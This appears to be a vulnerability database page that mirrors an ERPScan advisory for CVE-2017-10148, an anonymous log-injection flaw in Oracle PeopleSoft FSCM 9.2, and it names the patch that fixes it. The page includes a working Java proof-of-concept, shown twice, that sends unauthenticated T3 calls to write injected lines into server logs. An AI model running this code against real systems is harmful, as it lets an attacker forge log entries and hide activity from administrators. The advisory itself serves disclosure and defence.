Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-17-042
HistoryMar 16, 2017 - 12:00 a.m.

Anonymous log injection in FSCM

2017-03-1600:00:00
erpscan.io
547

EPSS

0.003

Percentile

66.0%

JSON

Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft FSCM 9.2 Vendor:Oracle **Bug:**Anonymous log injection **Reported:**16.03.2017 **Vendor response:**17.03.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148

CVSS Information

CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed ©
C: Impact to Confidentiality None (N)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can use a special T3 request to inject special data to log files.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017.

TECHNICAL DESCRIPTION

Proof of Concept

static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException { Properties p = new Properties(); p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”); p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT); Context ctx = new InitialContext(p); Object obj = ctx.lookup(“weblogic.common.T3Services”); Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class); T3ServicesDef h = (T3ServicesDef) o; h.log().log(“ERPScan_1\n\rERPScan_2”); h.log().info(“ERPScan_3\n\rERPScan_4”); h.log().error(“ERPScan_5\n\rERPScan_6”); h.log().warning(“ERPScan_7\n\rERPScan_8”); h.log().debug(“ERPScan_9\n\rERPScan_10”); return false; }

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

|

static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {

Properties p = new Properties();

p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”);

p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT);

Context ctx = new InitialContext(p);

Object obj = ctx.lookup(“weblogic.common.T3Services”);

Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);

T3ServicesDef h = (T3ServicesDef) o;

h.log().log(“ERPScan_1\n\rERPScan_2”);

h.log().info(“ERPScan_3\n\rERPScan_4”);

h.log().error(“ERPScan_5\n\rERPScan_6”);

h.log().warning(“ERPScan_7\n\rERPScan_8”);

h.log().debug(“ERPScan_9\n\rERPScan_10”);

return false;

}

—|—

Related

prion 1
cve 1
nvd 1
cvelist 1
nessus 1
openvas 1
oracle 1
prion
prion
Design/Logic Flaw
2017-08-08 15:29:00
cve
cve
CVE-2017-10148
2017-08-08 15:29:04
nvd
nvd
CVE-2017-10148
2017-08-08 15:29:04
cvelist
cvelist
CVE-2017-10148
2017-08-08 15:00:00
nessus
nessus
Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)
2017-07-19 00:00:00
openvas
openvas
Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)
2017-07-19 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2017
2018-03-20 00:00:00

EPSS

0.003

Percentile

66.0%

JSON
Related for ERPSCAN-17-042
prion1cve1nvd1cvelist1nessus1openvas1oracle1